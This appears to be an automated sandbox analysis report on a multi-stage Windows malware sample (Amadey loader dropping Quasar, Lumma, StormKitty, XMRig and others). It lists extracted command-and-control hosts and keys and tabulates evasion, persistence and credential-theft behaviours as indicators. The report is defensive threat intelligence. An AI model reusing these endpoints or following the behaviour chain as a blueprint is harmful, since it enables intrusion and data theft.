amadey | 749061d2ca909be45ba621dd67ae6b7554a6cb47a695d000c372bbdb028edd5b

Analysis

max time kernel
112s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
03/04/2025, 15:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

random.exe
Size

1.8MB
MD5

53363a4e50cc6db48afb277d159616d3
SHA1

d85c99250485e18a5b0e08f110a50a002c5bcad8
SHA256

749061d2ca909be45ba621dd67ae6b7554a6cb47a695d000c372bbdb028edd5b
SHA512

13b71edc3a675a15143a9b8b7e5178786bee5334d16a26af9312353af31cf5a3c67a2af80fbbd2af1918f7724272d7fddfd75e4c1e2d2bd269a22f5744c0e359
SSDEEP

49152:BWYtkpiHe4Fp0CmWQwVrZTm0JkJ5Oc8X:BWYYBUp0CTQwfS0kK

Malware Config

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

quasar

Version

1.5.0

Botnet

Office04

goku92ad.zapto.org:5000

Mutex

a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a

Attributes

encryption_key
BF72099FDBC6B48816529089CF1CF2CF86357D14
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Modded Client Startup
subdirectory
SubDir

Extracted

Family

lumma

https://tacticaltalks.live/glKShay

https://metalsyo.digital/opsa

https://iironloxp.live/aksdd

https://navstarx.shop/FoaJSi

https://starcloc.bet/GOksAo

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://xrfxcaseq.live/gspaz

https://jrxsafer.top/shpaoz

https://krxspint.digital/kendwz

https://rhxhube.run/pogrs

https://6grxeasyw.digital/xxepw

https://ywmedici.top/noagis

https://ironloxp.live/aksdd

https://gspacedbv.world/EKdlsk

https://1galxnetb.today/GsuIAo

Extracted

Family

gcleaner

185.156.73.98

45.91.200.135

Extracted

Family

darkvision

82.29.67.160

Attributes

url
http://107.174.192.179/data/003

https://grabify.link/ZATFQO

http://107.174.192.179/clean
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey
DarkVision Rat
DarkVision Rat is a trojan written in C++.
rat darkvision
Darkvision family
darkvision
GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
Gcleaner family
gcleaner
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
Njrat family
njrat
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral1/memory/3824-114-0x000000000CEC0000-0x000000000D014000-memory.dmp	family_quasar
behavioral1/memory/3824-115-0x0000000005690000-0x00000000056AA000-memory.dmp	family_quasar

StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 2 IoCs

resource	yara_rule
behavioral1/files/0x00070000000242ce-124.dat	family_stormkitty
behavioral1/memory/4360-138-0x0000000000D30000-0x0000000000D6C000-memory.dmp	family_stormkitty

Stormkitty family
stormkitty
Xmrig family
xmrig
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	random.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	88973ce112.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	e283363a52.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	05257e0038.exe

XMRig Miner payload 7 IoCs

miner

resource	yara_rule
behavioral1/memory/3836-373-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/3836-377-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/3836-379-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/3836-378-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/3836-376-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/3836-374-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/3836-380-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Blocklisted process makes network request 3 IoCs

flow	pid	Process
36	3824	powershell.exe
38	3824	powershell.exe
42	3824	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
6388	powershell.exe
5520	powershell.exe
5792	powershell.exe
5400	powershell.exe
2284	powershell.exe
2444	powershell.exe
3824	powershell.exe
412	powershell.exe

Contacts a large (1321) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 15 IoCs

flow	pid	Process
98	3092	svchost.exe
167	4616	rapes.exe
167	4616	rapes.exe
167	4616	rapes.exe
167	4616	rapes.exe
170	5844	svchost015.exe
126	4616	rapes.exe
33	4616	rapes.exe
33	4616	rapes.exe
33	4616	rapes.exe
33	4616	rapes.exe
33	4616	rapes.exe
154	4616	rapes.exe
94	4616	rapes.exe
94	4616	rapes.exe

Drops file in Drivers directory 4 IoCs

description	ioc	Process
File created	C:\Windows\System32\Drivers\9e186137.sys	1f52e62d.exe
File created	C:\Windows\System32\Drivers\klupd_9e186137a_arkmon.sys	1f52e62d.exe
File created	C:\Windows\system32\drivers\etc\hosts	P3Ow4LV.exe
File created	C:\Windows\system32\drivers\etc\hosts	updater.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

defense_evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2204	netsh.exe

Sets service image path in registry 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_9e186137a_arkmon\ImagePath = "System32\\Drivers\\klupd_9e186137a_arkmon.sys"	1f52e62d.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\9e186137\ImagePath = "System32\\Drivers\\9e186137.sys"	1f52e62d.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 14 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	88973ce112.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	e283363a52.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	e283363a52.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	05257e0038.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	05257e0038.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	88973ce112.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	random.exe
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	RucwqKUI8Hyb.exe
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	7IIl2eE.exe
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	server.exe
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	1f52e62d.exe

Deletes itself 1 IoCs

pid	Process
1076	w32tm.exe

Drops startup file 6 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_ba9f1e8c.cmd	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9f3e9d770477dc3974e76a18fdf63a0e.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9f3e9d770477dc3974e76a18fdf63a0e.exe	server.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_3bcb4971.cmd	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_3bcb4971.cmd	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_ba9f1e8c.cmd	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
4616	rapes.exe
4360	Yhihb8G.exe
5428	9sWdA2p.exe
2880	P3Ow4LV.exe
5960	88973ce112.exe
1028	rapes.exe
5844	svchost015.exe
4452	TbV75ZR.exe
836	RucwqKUI8Hyb.exe
2568	updater.exe
2084	dojG16n.exe
3084	server.exe
2296	7IIl2eE.exe
692	server.exe
1464	server.exe
5824	UZPt0hR.exe
1524	server.exe
3044	server.exe
4092	server.exe
3776	server.exe
3748	server.exe
5840	server.exe
5148	server.exe
5280	server.exe
5132	server.exe
4972	server.exe
208	server.exe
3336	server.exe
2164	tzutil.exe
1076	w32tm.exe
6668	server.exe
6988	server.exe
7052	server.exe
7108	server.exe
1464	server.exe
4688	server.exe
376	server.exe
3252	server.exe
5600	server.exe
4320	server.exe
940	server.exe
6332	server.exe
3708	e283363a52.exe
5612	server.exe
5324	server.exe
6336	server.exe
6536	server.exe
4044	server.exe
3472	server.exe
5108	server.exe
4332	server.exe
2832	server.exe
3356	server.exe
7148	server.exe
7152	server.exe
960	UZSECGPC.exe
1604	UZSECGPC.exe
5584	server.exe
7080	ISBEW64.exe
6628	server.exe
6268	ISBEW64.exe
6408	ISBEW64.exe
4300	server.exe
6964	server.exe

Identifies Wine through registry keys 2 TTPs 7 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine	05257e0038.exe
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine	random.exe
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine	88973ce112.exe
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine	e283363a52.exe
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine	rapes.exe

Impair Defenses: Safe Mode Boot 1 TTPs 3 IoCs

defense_evasion

Safe Mode Boot

T1562.009

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\9e186137.sys	1f52e62d.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\9e186137.sys	1f52e62d.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\9e186137.sys\ = "Driver"	1f52e62d.exe

Loads dropped DLL 34 IoCs

pid	Process
1604	UZSECGPC.exe
1604	UZSECGPC.exe
1604	UZSECGPC.exe
1604	UZSECGPC.exe
1604	UZSECGPC.exe
1604	UZSECGPC.exe
5436	CamMenuMaker.exe
5436	CamMenuMaker.exe
5436	CamMenuMaker.exe
5436	CamMenuMaker.exe
944	CamMenuMaker.exe
944	CamMenuMaker.exe
944	CamMenuMaker.exe
944	CamMenuMaker.exe
3756	1f52e62d.exe
3756	1f52e62d.exe
3756	1f52e62d.exe
3756	1f52e62d.exe
3756	1f52e62d.exe
3756	1f52e62d.exe
3756	1f52e62d.exe
3756	1f52e62d.exe
3756	1f52e62d.exe
3756	1f52e62d.exe
3756	1f52e62d.exe
3756	1f52e62d.exe
3756	1f52e62d.exe
3756	1f52e62d.exe
3756	1f52e62d.exe
3756	1f52e62d.exe
3756	1f52e62d.exe
3756	1f52e62d.exe
3756	1f52e62d.exe
3756	1f52e62d.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Yhihb8G.exe
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Yhihb8G.exe
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Yhihb8G.exe

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9f3e9d770477dc3974e76a18fdf63a0e = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .."	server.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\9f3e9d770477dc3974e76a18fdf63a0e = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .."	server.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\f7950cf4-afce-4fa5-a046-b7a79fa2d2ab = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{30d13f77-bf84-4b4a-b8f3-01a96a97b2f2}\\f7950cf4-afce-4fa5-a046-b7a79fa2d2ab.cmd\""	1f52e62d.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
310	ip-api.com
35	ipinfo.io
37	ipinfo.io

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
5612	powercfg.exe
5696	powercfg.exe
3588	powercfg.exe
2348	powercfg.exe
1748	powercfg.exe
4520	powercfg.exe
3092	powercfg.exe
1056	powercfg.exe

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	1f52e62d.exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\MRT.exe	P3Ow4LV.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	updater.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs

pid	Process
4284	random.exe
4616	rapes.exe
5960	88973ce112.exe
1028	rapes.exe
3708	e283363a52.exe
5776	rapes.exe
6752	05257e0038.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 5960 set thread context of 5844	5960	88973ce112.exe	132
PID 4452 set thread context of 5728	4452	TbV75ZR.exe	138
PID 2568 set thread context of 5228	2568	updater.exe	191
PID 2568 set thread context of 3836	2568	updater.exe	196
PID 2084 set thread context of 5448	2084	dojG16n.exe	198
PID 5724 set thread context of 1484	5724	PJ7KEk9.exe	416

UPX packed file 12 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/3836-369-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3836-373-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3836-377-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3836-379-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3836-378-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3836-376-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3836-374-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3836-372-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3836-371-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3836-368-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3836-370-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/3836-380-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	58b23bc9.exe
File opened (read-only)	\??\VBoxMiniRdrDN	1f52e62d.exe

Drops file in Windows directory 14 IoCs

description	ioc	Process
File opened for modification	C:\Windows\BrandonStat	7IIl2eE.exe
File opened for modification	C:\Windows\DiscussedFacial	7IIl2eE.exe
File opened for modification	C:\Windows\EnglandDeleted	7IIl2eE.exe
File opened for modification	C:\Windows\PotteryUser	7IIl2eE.exe
File opened for modification	C:\Windows\EstateLegislative	7IIl2eE.exe
File opened for modification	C:\Windows\JenniferSubdivision	7IIl2eE.exe
File opened for modification	C:\Windows\CorrectionsGeographic	7IIl2eE.exe
File opened for modification	C:\Windows\RowTopics	7IIl2eE.exe
File opened for modification	C:\Windows\SpecificsHeaven	7IIl2eE.exe
File opened for modification	C:\Windows\GentleLogging	7IIl2eE.exe
File created	C:\Windows\Tasks\rapes.job	random.exe
File opened for modification	C:\Windows\LogisticsNotre	7IIl2eE.exe
File opened for modification	C:\Windows\ProvidingMilwaukee	7IIl2eE.exe
File opened for modification	C:\Windows\WallpapersHo	7IIl2eE.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4316	sc.exe
4468	sc.exe
1920	sc.exe
2816	sc.exe
4300	sc.exe
2804	sc.exe
5716	sc.exe
1188	sc.exe
6128	sc.exe
860	sc.exe
1200	sc.exe
380	sc.exe
5708	sc.exe
5064	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Program crash 2 IoCs

pid	pid_target	Process	procid_target
2224	4360	WerFault.exe	109
3648	3672	WerFault.exe	513

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	05257e0038.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9sWdA2p.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	UZSECGPC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	88973ce112.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7IIl2eE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CamMenuMaker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	UZSECGPC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tmpF613.tmp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
